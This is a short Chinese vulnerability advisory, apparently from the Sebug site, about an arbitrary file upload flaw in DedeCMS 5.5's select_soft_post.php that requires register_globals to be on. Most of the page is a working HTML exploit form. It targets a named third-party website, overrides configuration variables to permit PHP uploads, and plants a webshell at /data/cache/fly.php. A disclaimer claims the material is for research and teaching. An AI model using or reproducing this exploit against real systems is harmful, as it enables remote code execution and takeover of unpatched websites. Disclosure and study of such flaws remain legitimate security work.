漏洞版本:
Dedecms 5.5
漏洞描述:
漏洞产生文件位于include\dialog\select_soft_post.php,其变量$cfg_basedir没有正确初始化,导致可以饶过身份认证和系统变量初始化文件,导致可以上传任意文件到指定目录。其漏洞利用前提是register_globals=on,可以通过自定义表单为相关的变量赋值。
<* 参考
by:Flyh4t
http://sebug.net/appdir/织梦(DedeCms)
*>
测试方法:
@Sebug.net dis
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
- <html>
- <head>
- <title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
- </head>
- <bodystyle="FONT-SIZE:9pt">
- ---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br/><br/>
- <formaction=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.phpmethod='POST'enctype="multipart/form-data"name='myform'>
- <inputtype='hidden'name='activepath'value='/data/cache/'/>
- <inputtype='hidden'name='cfg_basedir'value='../../'/>
- <inputtype='hidden'name='cfg_imgtype'value='php'/>
- <inputtype='hidden'name='cfg_not_allowall'value='txt'/>
- <inputtype='hidden'name='cfg_softtype'value='php'/>
- <inputtype='hidden'name='cfg_mediatype'value='php'/>
- <inputtype='hidden'name='f'value='form1.enclosure'/>
- <inputtype='hidden'name='job'value='upload'/>
- <inputtype='hidden'name='newname'value='fly.php'/>
- Select U Shell <inputtype='file'name='uploadfile'size='25'/>
- <inputtype='submit'name='sb1'value='确定'/>
- </form>
- <br/>It's just a exp for the bug of Dedecms V55...<br/>
- Need register_globals = on...<br/>
- Fun the game,get a webshell at /data/cache/fly.php...<br/>
- </body>
- </html>